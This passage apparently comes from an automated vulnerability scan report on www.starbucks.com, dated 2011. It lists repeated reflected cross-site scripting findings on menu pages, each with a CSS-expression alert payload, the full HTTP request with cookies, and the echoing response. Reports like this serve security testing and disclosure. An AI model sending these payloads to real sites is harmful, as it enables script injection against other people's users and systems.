The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5154"style%3d"x%3aexpression(alert(1))"95d490ebdf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5154"style="x:expression(alert(1))"95d490ebdf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-mocha?e5154"style%3d"x%3aexpression(alert(1))"95d490ebdf8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:31 GMT
Connection: close
Content-Length: 39835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha?e5154"style="x:expression(alert(1))"95d490ebdf8=1"/>
...[SNIP]...

2.89. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/bottled-frappuccino-vanilla

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a3a"style%3d"x%3aexpression(alert(1))"a035c85f5f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2a3a"style="x:expression(alert(1))"a035c85f5f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Request

GET /menu/drinks/bottled-drinks/bottled-frappuccino-vanilla?d2a3a"style%3d"x%3aexpression(alert(1))"a035c85f5f9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:30 GMT
Connection: close
Content-Length: 39905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla?d2a3a"style="x:expression(alert(1))"a035c85f5f9=1"/>
...[SNIP]...

2.90. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 895ee"style%3d"x%3aexpression(alert(1))"e3d116c9abe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 895ee"style="x:expression(alert(1))"e3d116c9abe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Request

GET /menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy?895ee"style%3d"x%3aexpression(alert(1))"e3d116c9abe=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:31 GMT
Connection: close
Content-Length: 39704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy?895ee"style="x:expression(alert(1))"e3d116c9abe=1"/>
...[SNIP]...

2.91. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/coffee-doubleshot-with-energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe726"style%3d"x%3aexpression(alert(1))"d19a9e87e85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe726"style="x:expression(alert(1))"d19a9e87e85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not support CSS expressions, and IE8 and later drop them in standards mode), so the alert may not fire elsewhere; the underlying defect, the reflection of an unencoded double quote inside a double-quoted attribute value, is not browser-specific.

Request

GET /menu/drinks/bottled-drinks/coffee-doubleshot-with-energy?fe726"style%3d"x%3aexpression(alert(1))"d19a9e87e85=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:38 GMT
Connection: close
Content-Length: 39838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy?fe726"style="x:expression(alert(1))"d19a9e87e85=1"/>
...[SNIP]...

2.92. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/coffee-frappuccino

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76702"style%3d"x%3aexpression(alert(1))"b4ae84575bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76702"style="x:expression(alert(1))"b4ae84575bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/coffee-frappuccino?76702"style%3d"x%3aexpression(alert(1))"b4ae84575bd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:51 GMT
Connection: close
Content-Length: 39815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino?76702"style="x:expression(alert(1))"b4ae84575bd=1"/>
...[SNIP]...

2.93. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/espresso-and-cream-doubleshot

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2267"style%3d"x%3aexpression(alert(1))"213c4c81aec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2267"style="x:expression(alert(1))"213c4c81aec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/espresso-and-cream-doubleshot?c2267"style%3d"x%3aexpression(alert(1))"213c4c81aec=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:30 GMT
Connection: close
Content-Length: 39894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot?c2267"style="x:expression(alert(1))"213c4c81aec=1"/>
...[SNIP]...

2.94. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 946db"style%3d"x%3aexpression(alert(1))"31b738e1403 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 946db"style="x:expression(alert(1))"31b738e1403 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot?946db"style%3d"x%3aexpression(alert(1))"31b738e1403=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:33 GMT
Connection: close
Content-Length: 39754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot?946db"style="x:expression(alert(1))"31b738e1403=1"/>
...[SNIP]...

2.95. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/mocha-doubleshot-with-energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9dc"style%3d"x%3aexpression(alert(1))"2308b961066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a9dc"style="x:expression(alert(1))"2308b961066 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/mocha-doubleshot-with-energy?2a9dc"style%3d"x%3aexpression(alert(1))"2308b961066=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:11 GMT
Connection: close
Content-Length: 39974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy?2a9dc"style="x:expression(alert(1))"2308b961066=1"/>
...[SNIP]...

2.96. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3544d"style%3d"x%3aexpression(alert(1))"5aba95253f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3544d"style="x:expression(alert(1))"5aba95253f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy?3544d"style%3d"x%3aexpression(alert(1))"5aba95253f2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:09 GMT
Connection: close
Content-Length: 39870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy?3544d"style="x:expression(alert(1))"5aba95253f2=1"/>
...[SNIP]...

2.97. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/bold-pick-of-the-day

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97603"style%3d"x%3aexpression(alert(1))"ccda16a9e2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97603"style="x:expression(alert(1))"ccda16a9e2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/bold-pick-of-the-day?97603"style%3d"x%3aexpression(alert(1))"ccda16a9e2a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:30 GMT
Connection: close
Content-Length: 41233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day?97603"style="x:expression(alert(1))"ccda16a9e2a=1"/>
...[SNIP]...

2.98. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/cafe-misto

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84eea"style%3d"x%3aexpression(alert(1))"3de17d6a195 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84eea"style="x:expression(alert(1))"3de17d6a195 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/cafe-misto?84eea"style%3d"x%3aexpression(alert(1))"3de17d6a195=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:02 GMT
Connection: close
Content-Length: 41226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto?84eea"style="x:expression(alert(1))"3de17d6a195=1"/>
...[SNIP]...

2.99. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/clover-brewed-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b665"style%3d"x%3aexpression(alert(1))"b850b32aa93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b665"style="x:expression(alert(1))"b850b32aa93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/clover-brewed-coffee?5b665"style%3d"x%3aexpression(alert(1))"b850b32aa93=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:33 GMT
Connection: close
Content-Length: 40818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee?5b665"style="x:expression(alert(1))"b850b32aa93=1"/>
...[SNIP]...

2.100. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/coffee-traveler

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea54a"style%3d"x%3aexpression(alert(1))"a6d99dcddd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea54a"style="x:expression(alert(1))"a6d99dcddd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/coffee-traveler?ea54a"style%3d"x%3aexpression(alert(1))"a6d99dcddd8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:39 GMT
Connection: close
Content-Length: 39163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler?ea54a"style="x:expression(alert(1))"a6d99dcddd8=1"/>
...[SNIP]...

2.101. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/decaf-pike-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a68"style%3d"x%3aexpression(alert(1))"76d19496ed1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75a68"style="x:expression(alert(1))"76d19496ed1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/brewed-coffee/decaf-pike-place-roast?75a68"style%3d"x%3aexpression(alert(1))"76d19496ed1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
